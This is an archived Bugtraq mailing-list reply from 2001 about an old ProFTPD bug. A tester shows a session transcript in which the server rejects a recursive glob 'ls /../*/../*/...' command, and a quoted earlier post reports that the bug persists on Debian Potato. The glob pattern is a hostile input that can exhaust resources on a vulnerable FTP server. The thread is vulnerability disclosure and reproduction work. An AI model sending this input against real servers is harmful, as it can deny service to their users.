Bugtraq mailing list archives

RE: Multiple-Vendor-FTP-Vuln. (old?)

From: Michael Bellears <michael.bellears () staff datafx com au>
Date: Tue, 21 Aug 2001 08:43:54 +1000

Couldn't reproduce on Debian 2.2....

isp-server-03:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*:
Forbidden command argument
ftp> quit
221 Goodbye.

Regards,
MB

-----Original Message-----
From: Michael Faurot [mailto:mfaurot () atww org]
Sent: Tuesday, 21 August 2001 5:20 AM
To: bugtraq () securityfocus com
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)

Enrico Kern <IphantomI () web de> wrote:
: Hi,

: i tested an old proftpd bug (ls 
/../*/../*/../*/../*/../*/../*/../*) on =
: many new Linux-Dist.. 

This bug appears to still be present with Debian Stable (Potato) which
uses ProFTPd v1.2.0pre10.

-- 
--------------------------------------------------------------
----------------
 Michael | mfaurot  | Give your child mental blocks for Christmas.
 Faurot  | atww.org |

Current thread:

Re: Multiple-Vendor-FTP-Vuln. (old?), (continued)
- Re: Multiple-Vendor-FTP-Vuln. (old?) skip (Aug 20)
  - RE: Multiple-Vendor-FTP-Vuln. (old?) jeev (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Scott Dier (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) Mike Jakubik (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Bernhard Rosenkraenzer (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Roman Drahtmueller (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Dmitriy Kropivnitskiy (Aug 21)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Michael Faurot (Aug 20)
  - Re: Multiple-Vendor-FTP-Vuln. (old?) Robert van der Meulen (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) E. van Elk (Aug 20)
- RE: Multiple-Vendor-FTP-Vuln. (old?) Michael Bellears (Aug 20)
- Re: Multiple-Vendor-FTP-Vuln. (old?) Michael Faurot (Aug 20)